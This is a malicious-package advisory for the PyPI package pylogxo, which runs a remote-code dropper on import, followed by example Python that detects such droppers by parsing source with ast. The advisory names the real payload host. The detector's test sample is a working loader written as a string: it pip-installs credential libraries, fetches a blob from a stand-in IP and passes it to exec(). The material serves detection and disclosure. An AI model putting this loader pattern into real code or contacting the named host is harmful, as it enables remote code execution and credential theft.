
pylogxo @1.0.4

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC

Malicious

OSV ID

MAL-2026-5679

Ecosystem

pypi

Summary

On import of pylogx, the package spawns a background thread that sleeps 5-20 seconds, force-installs a set of sensitive third-party packages (cryptography, pycryptodomex, secretstorage, opencv-python, pillow, psutil) via pip, then fetches a base64-encoded blob from http://69.164.245.166/payload.txt over plaintext HTTP and passes the decoded bytes to exec() under a synthetic __name__ of "__payload__". The destination is a bare IP with no TLS, no pinning and no signature verification, so whatever code the operator of that host (or anyone on the network path) serves at the moment of import runs inside the importing process. The pre-installed dependency set (secretstorage plus cryptography) is consistent with a follow-on credential or keyring harvester. The payload itself is not captured in this report, so any environment that imported the module should be treated as having executed attacker-controlled code.

The package is distributed under the name pylogxo but installs the import name pylogx, a near-edit of legitimate logging library names, and ships placeholder metadata (an empty README, https://github.com/example/pylogx, support@pylogx.example). It also references submodules (formatter, handlers) that do not exist in the tarball, so the module raises ImportError, but only after the dropper thread has already been started. There is no legitimate reason for a logging utility to fetch and execute remote code at import time.
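As an added triage check (this is example code, not part of the OSV entry or of Amazon Inspector's tooling), the following Python scans a module's source with the ast module for the indicators described above: a thread started at import time, a pip install, a plaintext http:// fetch, and exec() fed by a decode call. It parses the file without importing it, since importing is exactly what triggers the dropper. The sample it inspects is constructed to mirror that pattern and is not the pylogxo code; 198.51.100.7 is a documentation address standing in for the real host. The names scan_source, verdict and Finding are this example's own.

```python
import ast
from dataclasses import dataclass


@dataclass
class Finding:
    lineno: int
    rule: str     # which indicator matched
    reach: str    # "import-time" if reached on import, "deferred" if inside a def/class
    detail: str


# Constructed sample (NOT the pylogxo code): a minimal module shaped like the
# dropper the advisory describes. 198.51.100.7 is a documentation address.
SAMPLE_MODULE = '''\
import base64, subprocess, sys, threading, time, urllib.request

def _run():
    time.sleep(7)
    subprocess.check_call([sys.executable, "-m", "pip", "install",
                           "cryptography", "secretstorage"])
    blob = urllib.request.urlopen("http://198.51.100.7/payload.txt").read()
    exec(base64.b64decode(blob), {"__name__": "__payload__"})

threading.Thread(target=_run, daemon=True).start()
'''

# Constructed benign control: what a logging helper normally looks like.
BENIGN_MODULE = '''\
import logging

def get_logger(name):
    return logging.getLogger(name)
'''


def _callee(node):
    """Dotted name of a call target, e.g. 'urllib.request.urlopen' or 'exec'."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))


def _string_args(node):
    """String literals passed directly or inside a list/tuple argument."""
    for arg in node.args:
        elts = arg.elts if isinstance(arg, (ast.List, ast.Tuple)) else [arg]
        for e in elts:
            if isinstance(e, ast.Constant) and isinstance(e.value, str):
                yield e.value


def _import_time_nodes(tree):
    """Nodes executed when the module is imported: everything at top level
    except the bodies of def/class statements, which only run when called."""
    for stmt in tree.body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        yield from ast.walk(stmt)


def scan_source(src):
    """Return Findings for every suspicious call in the given module source."""
    tree = ast.parse(src)
    import_time = {id(n) for n in _import_time_nodes(tree)}
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _callee(node)
        strings = list(_string_args(node))
        reach = "import-time" if id(node) in import_time else "deferred"
        if name in ("exec", "eval"):
            first = node.args[0] if node.args else None
            fed_by = _callee(first) if isinstance(first, ast.Call) else "non-call argument"
            findings.append(Finding(node.lineno, "dynamic-exec", reach, f"{name}() fed by {fed_by}"))
        if any(s.startswith("http://") for s in strings):
            findings.append(Finding(node.lineno, "plaintext-fetch", reach, name))
        if "pip" in strings and "install" in strings:
            findings.append(Finding(node.lineno, "pip-install", reach, " ".join(strings)))
        if name.endswith("Thread"):
            findings.append(Finding(node.lineno, "background-thread", reach, name))
    return sorted(findings, key=lambda f: f.lineno)


def verdict(findings):
    """'dropper-like' needs remote-fetch + exec and something that fires on import."""
    rules = {f.rule for f in findings}
    fires_on_import = any(f.reach == "import-time" and f.rule in ("background-thread", "dynamic-exec")
                          for f in findings)
    if {"dynamic-exec", "plaintext-fetch"} <= rules and fires_on_import:
        return "dropper-like"
    return "suspicious" if rules else "clean"


if __name__ == "__main__":
    for sample in (SAMPLE_MODULE, BENIGN_MODULE):
        found = scan_source(sample)
        for f in found:
            print(f"line {f.lineno:>2}  {f.rule:<17} {f.reach:<11} {f.detail}")
        print("verdict:", verdict(found))
```

Point it at the extracted contents of a wheel or sdist (unpack with zipfile or tarfile, parse each .py file, never import it). The verdict is deliberately narrow: a thread or pip call on its own is only "suspicious", whereas the combination the advisory describes, a plaintext fetch feeding exec() with something that fires at import, is what the "dropper-like" verdict requires. A real scanner would also follow aliased imports and string concatenation, which this example does not.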

Source: amazon-inspector (bbeee018f429f5a978b85aa3999c8e24251a85dc787b1e4fd673abcabf157800)
